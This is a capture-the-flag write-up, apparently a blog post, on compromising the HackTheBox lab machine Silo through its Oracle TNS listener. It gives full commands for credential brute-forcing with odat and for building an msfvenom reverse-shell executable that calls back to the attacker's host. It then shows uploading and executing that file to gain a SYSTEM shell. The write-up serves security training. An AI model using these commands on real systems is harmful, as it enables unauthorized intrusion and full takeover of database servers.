Silo is a vulnerable virtual machine created by egre55 on HackTheBox. In this post, we document a complete walkthrough of pwning this machine.
Enumeration
Nmap
Starting off with the nmap scan, we discover that the target is running Windows Server 2008 R2. Available services include http, smb and Oracle TNS on port 1521/tcp.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ nmap -sC -sV -oA recon/default 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.10s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m32s, deviation: 0s, median: -1m32s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-16T04:49:30
|_ start_date: 2020-12-16T04:45:54
HTTP
Browsing web pages on the target, we only find a default IIS welcome page. We perform a directory fuzzing with ffuf, but nothing of interest is found.
1
2
3
$ ffuf -u http://10.10.10.82/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -c
aspnet_client [Status: 301, Size: 156, Words: 9, Lines: 2]
SMB
We try to list smb shares with null session authentication but get a STATUS_ACCESS_DENIED.
1
2
3
$ crackmapexec smb 10.10.10.82 -u '' -p '' --shares
SMB 10.10.10.82 445 SILO [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
SMB 10.10.10.82 445 SILO [-] SILO\: STATUS_ACCESS_DENIED
Exploitation
Oracle TNS Listener
A general guide to attacking the service can be found here. We will use odat to do this task. In Kali, it can be installed with apt. We can also check the GitHub repo if we need more up-to-date versions.
1
$ sudo apt install odat
First, we need to find a valid sid. The Oracle System ID (SID) is an unique identifier for every database in the system. We can consider it as an unique database name.
1
2
3
4
5
6
$ odat sidguesser -s 10.10.10.82 -p 1521
[1] (10.10.10.82:1521): Searching valid SIDs
...
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB
With the above odat command, we have found two valid sids. Next, we will try to enumerate login credentials for them. A small wordlist that comes with odat is being used first. Shortly, we find some valid credentials for the database system.
1
2
3
4
5
6
7
$ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
...
[+] Accounts found on 10.10.10.82:1521/XE:
scott/tiger
Having valid credentials, we can begin our exploitation. First, we check if the java module is available, which is the easiest way to achieve RCE.
1
2
3
4
5
$ sudo odat java -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --test-module
[1] (10.10.10.82:1521): Test if the DBMSScheduler library can be used
[1.1] JAVA library ?
[-] KO
It seems that we get KO’ed. Next, we try the dbmsscheduler module.
1
2
3
4
5
$ sudo odat dbmsscheduler -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --test-module
[1] (10.10.10.82:1521): Test if the DBMSScheduler library can be used
[1.1] DBMSSCHEDULER library ?
[-] KO
And we are KO’ed again. What about the externaltable module?
1
2
3
4
5
6
7
$ sudo odat externaltable -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --test-module
[1] (10.10.10.82:1521): Test if the External Table module can be used
[1.1] External table to read files ?
[+] OK
[1.2] External table to execute system commands ?
[+] OK
Sweet, we finally find a way to achieve RCE. To do it this way, we will need another module utlfile.
1
2
3
4
5
$ sudo odat utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --test-module
[1] (10.10.10.82:1521): Test if the UTL_FILE library can be used
[1.1] UTL_FILE library ?
[+] OK
Now that we are able to both write files and execute the files, we can begin to generate our payload with msfvenom.
1
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.18 lport=4444 -f exe -o rev.exe
We kindly upload our completely-not-malicious little program to the target.
1
2
3
4
$ sudo odat utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --putFile c:/windows/temp rev.exe `pwd`/rev.exe
[1] (10.10.10.82:1521): Put the /home/kali/silo/rev.exe local file in the c:/windows/temp folder like rev.exe on the 10.10.10.82 server
[+] The /home/kali/silo/rev.exe file was created on the c:/windows/temp directory on the 10.10.10.82 server like the rev.exe file
We execute our payload with the externaltable module. After that, odat hangs, which is a good sign to us.
1
2
3
$ sudo odat externaltable -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --sysdba --exec c:/windows/temp rev.exe
[1] (10.10.10.82:1521): Execute the rev.exe command stored in the c:/windows/temp path
Looking at our ncat listener, we get a reverse shell. We check the privileges and find that we are system. Pwned.
1
2
3
4
5
6
7
$ rlwrap ncat -nlvp 4444
...
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system